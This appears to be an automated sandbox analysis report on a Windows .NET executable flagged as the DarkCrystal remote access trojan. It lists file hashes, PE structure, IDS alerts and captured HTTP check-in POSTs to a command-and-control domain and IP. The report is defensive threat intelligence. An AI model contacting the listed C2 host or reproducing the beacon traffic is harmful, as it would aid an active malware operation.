                                                                          SHA1:16009B70B7AEFD29389DE4BD354C3F60E19A7E83
                                                                          SHA-256:2E416E0F1068E1E7B5106A80EA9E5491FEEDB09A6ADB8A1762C8EF44BD93D399
                                                                          SHA-512:FF8C3A9E0AE97AB33A4791CDB9BA463B47FEE319B50FAA6B86800B83E560439BD3DA4C63786300E273A7045184DBC5908A6EB50141459D749463E60C96CC15E4
                                                                          Malicious:false
                                                                          Preview:kA9oIIUVYb6BcURbnmiAEouUXof4DT347ihxC9j1
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):1224
                                                                          Entropy (8bit):4.435108676655666
                                                                          Encrypted:false
                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                          Malicious:false
                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4608
                                                                          Entropy (8bit):3.9963249113310817
                                                                          Encrypted:false
                                                                          SSDEEP:48:6gJzPt5M7Jt8Bs3FJsdcV4MKe27BdRajvqBHWOulajfqXSfbNtm:LPgPc+Vx9MsvkwcjRzNt
                                                                          MD5:71A4F77B0DE2AF3836AB43851FC6AAA3
                                                                          SHA1:0DCE4B2D8A9BC16077F05251BA977AE91CC284D2
                                                                          SHA-256:FAC0A7B8CA9B417B185809D593FEB029DD270C417DE49391E4296049970BF1CD
                                                                          SHA-512:C164F4634934064E4848E0B387A11E758E5F6D780034661AA9AAECC37D45CCF460A4EDA5464F434660C0B71969B60824336EC746D0D3759B1A7AEF48710E5791
                                                                          Malicious:true
                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):151
                                                                          Entropy (8bit):4.8487941168639646
                                                                          Encrypted:false
                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXwVTtQuJbsS8qXKNvo5XYUJFyXKvj:Vx993DEUftB1sS8+JXFyXs
                                                                          MD5:C27235F1960C1D4AAFDFCB9929C712B9
                                                                          SHA1:B4962CC540729EB2B47285B575AF377AA57D3FF1
                                                                          SHA-256:82746B79A990FAFF2124EAC2BAD5043B08C8E3A388FC862FFFEA74DCEFE1A845
                                                                          SHA-512:6239615B9B74E19AAB3C3AB83DB2A0D1FCE6402A75C02121CB0F2C83F7749A7F5083E1A7715A09A8906B8A524651A57544158DCF643BF071F44A96204FCB5409
                                                                          Malicious:false
                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 08/01/2025 14:29:16..14:29:16, error: 0x80072746.14:29:21, error: 0x80072746.
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.539358678373951
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:PlZA6b48MW.exe
                                                                          File size:1'917'440 bytes
                                                                          MD5:32db4bf35b9c2efc730718e2f8cd4fbc
                                                                          SHA1:616a5c549f6c1c191f82d8cea82c65e25869241e
                                                                          SHA256:2fb0b933c97aa9b37e31f7adf38695e8185b61c7d312c183f05fd4256ef38497
                                                                          SHA512:577146b764a00bcd3ff34a4ec278c49db91e7a5eb3647f561455499a7c01c52c513a5283041a378ffb57747e0ad0c93795d7287b5814a01f94612ac81f1828c2
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          TLSH:2695AE1A65E34E32C2A1173165A7113DC291D7623552FF0B361F2492A84BBF1AEB36F3
                                                                          Icon Hash:90cececece8e8eb0
                                                                          Entrypoint:0x5d585e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6749EC6C [Fri Nov 29 16:31:40 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d5810         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1d6000         0x320         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1d8000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x1d3864      0x1d3a00  ccc75a4b741ae284a0780af580f266f2  False     0.7785137454891741   data       7.542820283476374    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x1d6000         0x320         0x400     3720f37e3ecb95f78fcf18a649002524  False     0.3525390625         data       2.6537284131589467   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x1d8000         0xc           0x200     15cfe4d3fde5610987a754c2b181bad0  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name        RVA       Size   Type  Language  Country  ZLIB Complexity
RT_VERSION  0x1d6058  0x2c8  data                     0.46207865168539325

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                        SID      Signature                                             Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2025-01-08T19:22:12.441622+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49730        37.44.238.250  80         TCP
2025-01-08T19:22:16.937599+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49735        37.44.238.250  80         TCP
2025-01-08T19:22:23.010082+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49738        37.44.238.250  80         TCP
2025-01-08T19:22:26.775231+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49739        37.44.238.250  80         TCP
2025-01-08T19:22:49.408027+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49740        37.44.238.250  80         TCP
2025-01-08T19:22:58.845549+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49753        37.44.238.250  80         TCP
2025-01-08T19:23:01.873573+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49769        37.44.238.250  80         TCP
2025-01-08T19:23:09.111175+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49805        37.44.238.250  80         TCP
2025-01-08T19:23:12.439331+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49826        37.44.238.250  80         TCP
2025-01-08T19:23:15.569473+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49841        37.44.238.250  80         TCP
2025-01-08T19:23:19.060915+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49856        37.44.238.250  80         TCP
2025-01-08T19:23:45.937610+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49998        37.44.238.250  80         TCP
2025-01-08T19:23:54.634534+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  50016        37.44.238.250  80         TCP
2025-01-08T19:23:58.095640+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  50017        37.44.238.250  80         TCP
2025-01-08T19:24:02.259011+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  50018        37.44.238.250  80         TCP
2025-01-08T19:24:20.595673+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  50019        37.44.238.250  80         TCP
2025-01-08T19:24:31.736429+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  50020        37.44.238.250  80         TCP
                                                                          Jan 8, 2025 19:24:02.410572052 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.920655012 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.925839901 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:19.925909042 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.926120043 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.930924892 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.283421993 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.288244009 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.554718971 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.595673084 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.685286999 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.736301899 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.759145975 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.987978935 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.992918968 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:30.992991924 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.993206024 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.997961998 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.345933914 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:31.350810051 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.692440033 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.736428976 CET5002080192.168.2.437.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 19:22:11.635302067 CET | 54313 | 53 | 192.168.2.4 | 1.1.1.1
Jan 8, 2025 19:22:11.644741058 CET | 53 | 54313 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 19:22:11.635302067 CET | 192.168.2.4 | 1.1.1.1 | 0xf0fa | Standard query (0) | 505905cm.n9shka.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 19:22:11.644741058 CET | 1.1.1.1 | 192.168.2.4 | 0xf0fa | No error (0) | 505905cm.n9shka.top | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                                                          • 505905cm.n9shka.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | 8256 | C:\Users\user\Desktop\PlZA6b48MW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:11.657777071 CET | 315 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:12.002999067 CET | 344 | OUT | Data Raw: 00 07 04 01 03 0f 01 04 05 06 02 01 02 04 01 07 00 07 05 08 02 03 03 08 01 06 0d 02 03 00 02 09 0a 03 05 0a 03 54 03 07 0b 04 04 03 00 06 05 56 05 03 0c 0a 0e 02 07 0b 07 05 07 04 01 0b 00 0b 02 00 0d 59 07 06 04 01 0b 04 0f 03 0d 53 0e 09 05 54
                                                                          Data Ascii: TVYSTZVTU\L~Ah^bOcq~XaKURhRX]`lpO~sk_lU|^o`uZknl`^|i_~V@@{}fA~Lq
Jan 8, 2025 19:22:12.305756092 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:12.441554070 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 37.44.238.250 | 80 | 8380 | C:\Users\user\Desktop\PlZA6b48MW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:15.940177917 CET | 314 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:16.298755884 CET | 344 | OUT | Data Raw: 00 03 04 00 03 0d 04 01 05 06 02 01 02 0d 01 00 00 0a 05 0a 02 05 03 0c 00 0e 0d 50 04 0f 02 08 0d 03 07 59 00 56 05 05 0d 03 07 06 06 0a 05 01 06 53 0e 09 0e 04 07 04 01 06 06 56 06 04 04 0e 00 05 0e 09 07 04 06 52 0b 01 0b 01 0f 02 0f 02 04 02
                                                                          Data Ascii: PYVSVRVQ\L}U|NaZ`byBuKUkR\^wBcY~cZx|dZz`rIhnpcws^~u~V@xC\O}ba
Jan 8, 2025 19:22:16.805242062 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:16.937552929 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:16 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | 8696 | C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:22.244183064 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:22.595662117 CET | 344 | OUT | Data Raw: 05 00 01 00 03 0c 04 02 05 06 02 01 02 06 01 00 00 03 05 08 02 03 03 0e 03 06 0f 51 07 57 03 05 0a 04 05 08 02 51 07 06 0c 0a 04 07 05 00 06 07 04 07 0d 0c 0e 01 04 00 04 53 04 57 06 0a 04 0c 05 07 0a 0f 05 52 06 56 0d 07 0c 03 0d 03 0e 03 06 00
                                                                          Data Ascii: QWQSWRVWXQ\L~@~`TNcrb]b[xBWcltL|MZxlgz`Pn|wIhLe~V@BxCvA~Li
Jan 8, 2025 19:22:22.875893116 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:23.010027885 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 37.44.238.250 | 80 | 8836 | C:\Users\user\Desktop\PlZA6b48MW.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:25.984175920 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:26.330033064 CET | 344 | OUT | Data Raw: 00 04 01 05 06 0a 04 07 05 06 02 01 02 0c 01 04 00 01 05 09 02 01 03 0c 00 55 0c 06 04 03 03 02 0c 0f 04 00 03 07 04 06 0c 0a 02 04 05 50 07 0e 05 04 0e 01 0a 07 06 00 04 01 06 04 04 57 07 5c 00 57 0f 5a 00 02 04 09 0f 0f 0d 00 0f 0c 0b 09 04 54
                                                                          Data Ascii: UPW\WZT\SU\L~N|p_^wbiBuuthBr_tw_hcw_{RwKx^jktwtpje~V@{C~N~ba
Jan 8, 2025 19:22:26.641211033 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:26.775063992 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.4 | 49740 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:48.726655960 CET | 315 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:49.080116987 CET | 344 | OUT | Data Raw: 00 0b 01 02 06 0c 04 02 05 06 02 01 02 02 01 05 00 02 05 09 02 0c 03 0f 01 56 0e 03 07 04 00 03 0d 54 04 0a 00 07 04 51 0d 04 06 05 05 01 07 03 06 0b 0f 59 0d 57 04 0a 06 03 06 03 04 01 00 01 00 05 0e 0b 05 52 05 51 0d 0f 0b 04 0f 50 0e 06 07 01
                                                                          Data Ascii: VTQYWRQPQRTW\L~Nk`a^wq}Lu\PoeBwR{^~`tKlsx`v|ThC`IR~u~V@{SrNrS
